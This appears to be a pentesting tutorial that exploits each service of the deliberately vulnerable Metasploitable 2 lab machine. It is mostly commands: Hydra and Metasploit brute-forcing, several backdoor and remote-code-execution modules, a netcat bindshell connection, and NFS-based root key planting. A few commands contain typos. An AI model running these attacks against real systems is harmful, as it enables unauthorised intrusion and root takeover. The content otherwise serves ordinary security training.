If you’ve ever tried to learn about pentesting you would
have come across Metasploitable in one way or another. In this article we will
be exploiting all the services running in Metasploitable 2, so without further
ado, let’s dive in.
Table of Content
§
Network Scan
§
Exploiting Port 21 FTP (Hydra)
§
Exploiting VSFTPS 2.3.4
§
Exploiting Port 22 SSH
§
Bruteforce Port 22 SSH (RSA Method)
§
Exploiting port 23 TELNET (Credential Capture)
§
Exploiting TELNET (Bruteforce)
§
Port 25 SMTP User Enumeration
§
Exploiting Port 80 (PHP)
§
Exploiting Port 139 & 445 (Samba)
§
Exploiting Port 8080 (Java)
§
Exploiting Port 5432 (Postgres)
§
Exploiting Port 6667 (UnrealIRCD)
§
Exploiting Port 36255
§
Remote Login Exploitation
§
Remote Shell Exploitation
§
Exploiting Port 8787
§
Bindshell
§
Exploiting Port 5900 (VNC)
§
Access Port 2121 (ProFTPD)
§
Exploiting Port 8180 (Apache Tomcat)
§
Privilege Escalation via NFS
§
Exploiting Port 3306 (MYSQL)
Network
Scan
The first step towards doing what we want to achieve is a
service scan that looks at all the 65535 ports of Metasploitable 2 to see
what’s running where and with what version. You will notice the result in the
image below.
nmap -p- -sV
192.168.1.103
Exploiting
Port 21: FTP
We have all our ports and services listed now, let’s
start by Exploiting port 21 running FTP. We will be using Hydra for this. The two
wordlists for this operation will have default login names and passwords.
Hydra shows us that we have 4 valid login ID’s and
passwords.
hydra -L user.txt
-P pass.txt 192.168.1.103 ftp
Let’s put our findings to use and try to connect using
ftp.
ftp 192.168.1.103
Exploiting
VSFTPS 2.3.4
We have exploited the service running on port 21, now we
will exploit the particular version of the FTP service. We will be searching
for an exploit for VSFTPD 2.3.4 using Searchsploit.
searchsploit
vsftpd
We now have our exploit, let’s get into Metasploit and
run it.
This module exploits a malicious backdoor that was added
to the VSFTPD download archive. This backdoor was introduced into the
vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according
to the most recent information available. This backdoor was removed on July 3rd
2011.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit (unix/ftp/vsftpd_234_backdoor) > set rhost
192.168.1.103
msf exploit (unix/ftp/vsftpd_234_backdoor) > exploit
And as you can observe, we have owned command shell of
remote machine.
Exploiting
Port 22 SSH
Metasploit has an auxiliary function that we will use on
the SSH service running on port 22. One we get our session through it we will
be upgrading it to Meterpreter.
This module will test ssh logins on a range of machines and
report successful logins. If you have loaded a database plugin and connected to
a database this module will record successful logins and hosts so you can track
your access.
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary (scanner/ssh/ssh_login) > set rhosts
192.168.1.103
msf auxiliary (scanner/ssh/ssh_login) > set user_file
/root/Desktop/user.txt
msf auxiliary (scanner/ssh/ssh_login) > set pass_file
/root/Desktop/pass.txt
msf auxiliary (scanner/ssh/ssh_login) > exploit
And as you can observe, again we have owned command shell
of remote machine.
Bruteforce
Port 22 SSH (RSA Method)
This time we will bruteforce the SSH service using a 5720.py
exploit. The exploit comes with RSA keys that it used to bruteforce
the root login. We will basically be running the exploit by giving it the the
path to the RSA keys we want to use and the IP of the target machine. Here’s
how it works.
python 5720.py
5622/rsa/2048/ 192.168.1.103 root
Success! It
finds the right key pretty quick and gives the exact command to execute to get
a successful connection.
Exploiting
port 23 TELNET (Credential Capture)
We are using Wireshark to capture the TCP traffic, it is
set to run in the background while we connect to Metasploitable 2 through
telent using “msfadmin” as credentials for user name and password.
telnet
192.168.1.103
Once successfully
connected we go back to Wireshark. Now we click the “TCP Stream” option under
Analyze > Follow. This shows us the login credentials in plain text.
Exploiting
TELNET
This module will test a telnet login on a range of
machines and report successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins and hosts so
you can track your access. The same password and user file from earlier will be
used for this.
msf > use auxiliary/scanner/telnet/telnet_login
msf auxiliary (scanner/telnet/telnet_login) > set
rhosts 192.168.1.103
msf auxiliary (scanner/telnet/telnet_login) > set
user_file /root/Desktop/user.txt
msf auxiliary (scanner/telnet/telnet_login) > set
pass_file /root/Desktop/pass.txt
msf auxiliary (scanner/telnet/telnet_login) > set
stop_on_success true
msf
auxiliary (scanner/telnet/telnet_login) > exploit
Port
25 SMTP User Enumeration
Kali comes with a tool called “Smtp-User-Enum”, it’s has multiple modes that deal with different
facets of SMTP, we will be using it to verify which SMTP usernames exist in
victim machine.
We will see that the tool lets us know which all
usernames exist that I have saved in my user.txt file.
smtp-user-enum -M
VRFY -U user.txt -t 192.168.1.103
Exploiting
Port 80 (PHP_CGI)
We know that
port 80 is open so we type in the IP address of Metasploitable 2 in our browser
and notice that it is running PHP. We dig a little further and find which
version of PHP is running and also that it is being run as a CGI. We will now
exploit the argument injection vulnerability of PHP 2.4.2 using Metasploit.
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is
vulnerable to an argument injection vulnerability. This module takes advantage
of the -d flag to set php.ini directives to achieve code execution. From the
advisory: "if there is NO unescaped '=' in the query string, the string is
split on '+' (encoded space) characters, urldecoded, passed to a function that
escapes shell metacharacters (the "encoded in a system-defined manner"
from the RFC) and then passes them to the CGI binary." This module can
also be used to exploit the plesk 0day disclosed by kingcope and exploited in
the wild on June 2013.
msf > use exploit/multi/http/php_arg_injection
msf exploit (multi/http/php_arg_injection) > set rhost
192.168.1.103
msf exploit (multi/http/php_arg_injection) > exploit
Exploiting
Port 139 & 445 (Samba)
Samba is running on both port 139 and 445, we will be
exploiting it using Metasploit. The default port for this exploit is set to
port 139 but it can be changed to port 445 as well.
msf > use exploit/multi/samba/usermap_script
msf exploit (multi/samba/usermap_script) > set rhost
192.168.1.103
msf exploit (multi/samba/usermap_script) > exploit
Exploiting
Port 8080 (Java)
This module takes advantage of the default configuration
of the RMI Registry and RMI Activation services, which allow loading classes
from any remote (HTTP) URL. As it invokes a method in the RMI Distributed
Garbage Collector which is available via every RMI endpoint, it can be used
against both rmiregistry and rmid, and against most other (custom) RMI
endpoints as well. Note that it does not work against Java Management Extension
(JMX) ports since those do not support remote class loading, unless another RMI
endpoint is active in the same Java process. RMI method calls do not support or
require any sort of authentication.
We will be using the Remote Method Invocation exploit on
the Java service running on port 8080. It’s quite straight forward, just choose
the exploit, set the target machine IP and that’s it.
msf exploit (multi/misc/java_rmi_server) > set rhost
192,168.1.103
msf exploit (multi/misc/java_rmi_server) > exploit
Exploiting
Port 5432 (Postgres)
Postgres is associated with SQL is runs on port 5432 and
we have a great little exploit that can be used here.
On some default Linux installations of PostgreSQL, the
postgres service account may write to the /tmp directory, and may source UDF
Shared Libraries from there as well, allowing execution of arbitrary code. This
module compiles a Linux shared object file, uploads it to the target host via
the UPDATE pg_largeobject method of binary injection, and creates a UDF (user
defined function) from that shared object. Because the payload is run as the
shared object's constructor, it does not need to conform to specific Postgres
API versions.
msf exploit (linux/postgres/postgres_payload) > set
rhost 192.168.1.103
msf exploit (linux/postgres/postgres_payload) >
exploit
Exploiting
Port 6667 (UnrealIRCD)
Port 6667 has the Unreal IRCD service running, we will
exploit is using a backdoor that’s available in Metasploit.
This module exploits a malicious backdoor that was added
to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
msf exploit (unix/irc/unreal_ircd_3281_backdoor) > set
rhost 192.168.1.103
msf exploit
(unix/irc/unreal_ircd_3281_backdoor) > exploit
Exploiting
Port 36255
This is a weakness that allows arbitrary commands on
systems running distccd. We will be using Distcc Daemon Command Execution. This
module uses a documented security weakness to execute arbitrary commands on any
system running distccd.
msf exploit (unix/misc/distcc_exec) > set rhost
192.168.1.103
msf exploit (unix/misc/distcc_exec) > exploit
Remote
Login Exploitation
Remote login
is a tool that was used before ssh came into the picture. Since we have the
login credentials for Metasploitable 2, we will be using Rlogin to connect to
it, using the “-l” flag to define the login name.
rlogin -l msfadmin 192.168.1.103
Metasploit has
a module in its auxiliary section that we can use to get into the rlogin.
msf auxiliary (scanner/rservices/rlogin_login) > set
rhosts 192.168.1.103
msf auxiliary (scanner/rservices/rlogin_login) > set
username root
msf auxiliary (scanner/rservices/rlogin_login) > exploit
Remote
Shell Exploitation
Remote shell Protocol is another way to gain remote shell, it
is a legitimate service that we will use to access the target machine with login
credentials to run a certain command.
rsh -l msfadmin
192.168.1.103 ifconfig
Exploiting Distributed Ruby Remote Code Execution (8787)
Now that we know that this service is running
successfully, let’s try to exploit it using Metasploit.
This module exploits remote code execution
vulnerabilities in dRuby.
msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit (linux/misc/drb_remote_code) > set rhost
192.168.1.103
msf exploit (linux/misc/drb_remote_code) > exploit
Bindshell
Exploitation
Metasploitable 2 comes with an open bindshell service running
on port 1524. We will be using Netcat to connect to it.
nc 192.168.1.103 1524
Exploiting
Port 5900 (VNC)
Virtual Network computing or VNC service runs on port 5900,
this service can be exploited using a module in Metasploit to find the login
credentials.
This module will test a VNC server on a range of machines and
report successful logins. Currently it supports RFB protocol version 3.3, 3.7,
3.8 and 4.001 using the VNC challenge response authentication method.
msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary (scanner/vnc/vnc_login) > set login 192.168.1.103
msf auxiliary (scanner/vnc/vnc_login) > exploit
Let’s put what we’ve found to the test by connecting using
the vncviewer
vncviewer 192.168.1.103
The credentials work and we have a remote desktop session
that pops up in Kali.
Access Port
2121 (ProFTPD)
We will connect to the target machine using Telnet running on
port 2121 using the default credentials for Metasplotable 2.
telnet 192.168.1.103
2121
Exploiting
Port 8180 (Apache Tomcat)
We saw during the service scan that Apache Tomcat is
running on port 8180. Incidentally,
Metasploit has an exploit for Tomcat that we can use to get a Meterpreter
session. The exploit uses the default credentials used by Tomcat to gain
access.
This module can be used to execute a payload on Apache
Tomcat servers that have an exposed "manager" application. The
payload is uploaded as a WAR archive containing a jsp application using a POST
request against the /manager/html/upload component. NOTE: The compatible
payload sets vary based on the selected target. For example, you must select
the Windows target to use native Windows payloads.
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit (multi/http/tomcat_mgr_upload) > set rhost
192.168.1.103
msf exploit (multi/http/tomcat_mgr_upload) > set rpost
8108
msf exploit (multi/http/tomcat_mgr_upload) > set
httpusername tomcat
msf exploit (multi/http/tomcat_mgr_upload) > set
httppassword tomcat
msf exploit (multi/http/tomcat_mgr_upload) >
exploit
Privilege Escalation via Port 2049: NFS
In this method we will be creating a ssh key without a
passphrase and exchanging it with the ssh key of the victim machine for the
root user.
First, we use ssh-keygen to generate a RSA keypair without a
key phrase, then we place it in the “/root/.ssh” folder where the key is found
by default. Once the key is created and
placed, we will create a directory “/tmp/sshkey/” in our local machine.
The next part is a little tricky, we will be mounting the
directory we just made on the victim machine using the Network File Sharing
Function. Once mounted we write the key from our machine to the victim’s
machine, a sort of an override, using the cat command. The thing to keep in
mind here is that the key we have is without a passphrase so the after the
override the key in the victim machine is also without a passphrase, so when it
is connected using ssh, it’s using a blank password.
The key is now copied so we unmount the directory and connect
as the root user using ssh.
showmount -e 192.168.1.103
ssh-keygen
mkdir /tmp/sshkey
mount -t nfs 192.168.1.103:/ /tmp/sshkey/
cat ~/ .ssh/id_rsa.pub >>/tmp/sshkey/root/
.ssh/authorized_keys
umount /tmp/sshkey
ssh root@192.168.1.103
Exploiting Port 3306 (MYSQL)
The mySQL database in Metasploitable 2 has negligible
security, we will connect to it using the mySQL function of Kali by defining
the username and host IP. The password will be left blank.
mysql -u root -h
192.168.1.103 -p
This article is a gateway into the world of pentesting. Its
intent is to give you a single source containing all the ways and means to
exploit all the vulnerabilities of Metasploiable 2 classified by port’s and
services, it doesn’t get any better than this.
